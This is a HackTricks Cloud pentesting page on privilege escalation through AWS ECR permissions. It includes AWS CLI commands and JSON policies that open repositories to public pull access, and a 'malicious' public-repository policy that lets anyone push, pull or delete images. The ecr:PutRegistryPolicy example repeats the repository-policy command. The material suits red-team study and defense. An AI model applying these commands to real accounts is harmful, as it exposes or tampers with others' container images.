HackTricks Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - ECR Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

ECR

ecr:GetAuthorizationToken,ecr:BatchGetImage

An attacker with the ecr:GetAuthorizationToken and ecr:BatchGetImage can login to ECR and download images.

For more info on how to download images:

pageAWS - ECR Post Exploitation

Potential Impact: Indirect privesc by intercepting sensitive information in the traffic.

ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart

An attacker with the all those permissions can login to ECR and upload images. This can be useful to escalate privileges to other environments where those images are being used.

To learn how to upload a new image/update one, check:

pageAWS - EKS Enum

ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart

Like the previous section, but for public repositories.

ecr:SetRepositoryPolicy

An attacker with this permission could change the repository policy to grant himself (or even everyone) read/write access. For example, in this example read access is given to everyone.

aws ecr set-repository-policy \
    --repository-name <repo_name> \
    --policy-text file://my-policy.json

Contents of my-policy.json:

{
    "Version" : "2008-10-17",
    "Statement" : [
        {
            "Sid" : "allow public pull",
            "Effect" : "Allow",
            "Principal" : "*",
            "Action" : [
                "ecr:BatchCheckLayerAvailability",
                "ecr:BatchGetImage",
                "ecr:GetDownloadUrlForLayer"
            ]
        }
    ]
}

ecr-public:SetRepositoryPolicy

Like the previoous section, but for public repositories. An attacker can modify the repository policy of an ECR Public repository to grant unauthorized public access or to escalate their privileges.

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "MaliciousPublicRepoPolicy",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "ecr-public:GetDownloadUrlForLayer",
        "ecr-public:BatchGetImage",
        "ecr-public:BatchCheckLayerAvailability",
        "ecr-public:PutImage",
        "ecr-public:InitiateLayerUpload",
        "ecr-public:UploadLayerPart",
        "ecr-public:CompleteLayerUpload",
        "ecr-public:DeleteRepositoryPolicy"
      ]
    }
  ]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Potential Impact: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images.

ecr:PutRegistryPolicy

An attacker with this permission could change the registry policy to grant himself, his account (or even everyone) read/write access.

aws ecr set-repository-policy \
    --repository-name <repo_name> \
    --policy-text file://my-policy.json
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

PreviousAWS - EC2 PrivescNextAWS - ECS Privesc

Last updated